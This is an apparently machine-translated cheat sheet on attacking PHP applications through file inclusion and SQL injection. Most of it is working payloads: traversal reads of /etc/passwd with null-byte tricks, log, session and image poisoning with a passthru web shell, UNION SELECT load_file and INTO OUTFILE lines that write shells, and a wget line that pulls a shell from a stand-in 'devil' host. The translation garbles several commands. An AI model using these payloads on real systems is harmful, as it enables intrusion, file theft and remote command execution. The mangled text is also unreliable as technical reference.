Summary of file inclusion and injection

1. The file contains sensitive information, execution commands, and GetWebshell by passing local or remote files (allow_url_fopen enabled) as parameters. type of call: require ($ file); Exploit: http://host/?file=/etc/passwd Type of call: require ("supported des/". $ file); Exploit: http://www.bkjia.com /? File = .. /.. /.. /.. /.. /etc/passwd Tpye of CILS: require ("ages /". $ lang. ". php "); require (" themes /". $ theme. "/config. php "); Exploit: http://host/?file=../../../../../etc/passwd%00 Type of call: require ("ages /". $ _ COOKIE ['lang ']. ". php "); Exploit: javascript: document. cookie = "lan = .. /.. /.. /.. /.. /etc/passwd % 00 "; 2. If the command is executed, <? Passthru ($ _ GET [cmd])?> Upload the file to the server and use the file inclusion function. Method 1: insert the content into the apache log. Page where the request does not exist: http://host/xxxxxxx= <? Passthru (\ $ _ GET [cmd])?> Then follow the preceding request method: http://host/?file=../../../var/apache/error_log&cmd=ls /Etc http://host/?file=../../../var/apache/error_log&cmd=uname -If a does not know the apache address, it can use an error that contains an existing file to report the current location. Of course, this depends on different operating systems. The default apache address is different. In addition, you can locate the apache Log Path through the enumeration table. /Proc/{PID}/fd/{FD_ID} code (Omitted) pepelux :~ $ Perl proc. pl http://host/index.php Page GETApache PID: 4191FD_SIZE: 64FD: 2 the PID and FD_ID can be constructed in this way. http://host/?file=/proc/4191/fd/2&cmd=uname - http://host/index.php ? X = <? Passthru (\ $ _ GET [cmd])?> If it fails, set <? Convert to hexadecimal. If not, you can also put the segment characters in the header field, such as User-Agent and Referer exploitation method 2: insert/proc/self through the environment variable to point to the link used by the last PID. /Proc/self/environ is a known path, but generally users do not have permission to read. In linux,/proc/self is an environment variable that can be written and its position is fixed. Put the code in the User-Agent for submission, and then request: http://host/?file=../../../proc/self/environ&cmd=uname -A does not understand it. Generally, the permission should not work. Method 3: insert the code into the image and add a sentence to the image. Then upload the code and use it directly. http://host/?file=path/avatar.gif&cmd=uname -Method 4: insert the code to the session file. If the code is verified by the session and the session field is known. http://host/?user= <? Passthru ($ _ GET [cmd])?> Find the session value (browser) and file location (generally/tmp/session value ). And then include it directly. Method 5: Other logs of other files. If FTP is used, the user name for submission is <? Passthru ($ _ GET [cmd])?> If the server version is older, you can use the PUT Method to submit code. Get shell: http://host/?file=xxxx&cmd=wget http://devil/shell.txt -O shell. php 3. Injection and File Inclusion Method 1: injection to read Key Files http://host/?id=-1 Union select 1, 2, 3, load_file ('/etc/passwd'); If magic_quotes is enabled http://host/?id=-1 Union select 1, 2, 3, load_file (0x2f6574632f706173737764); Method 2: pilot output and then read http://host/?id=1 Outfile "/tmp/SQL .txt" http://host/?id=-1 Union select 1, 2, 3, load_file ('/tmp/SQL .txt'); Method 3: generate a sentence directly http://host/?id=-1 Union select 1, load_file ("/etc/passwd"), 1 into outfile "/var/www/host.com/www/passwd" http://host/?id=-1 Union select 1, "<? Phpinfo ()?> ", 1 into outfile "/var/www/host.com/www/phpinfo.php?if the directory cannot be written, you can first export it to TMP http://host/?id=-1 Union select 1, "<? Passthru ($ _ GET [cmd])?> ", 1, 1, into outfile "/tmp/SQL .txt" http://host/?file=../../../tmp/sql.txt&cmd=uname -A: 1) PHP 5.3.4 and later versions have fixed the % 00 vulnerability. 2) some time ago, select * from kj_tab limit 1 into outfile "d:/kj.txt" lines terminated by "<? Php eval ($ living)?>" 3) The reference file contains several small tools written in perl for help. 4) for more information about how to use LFI With phpinfo to obtain shell, see LFI With PHPInfo Assistance.pdf 5) a similar article about how to include 80 sec in command execution method 2. Reference file: Web vulnerabilities to gain access to the system http://www.enye-sec.org/en/papers/web_vuln-en.txt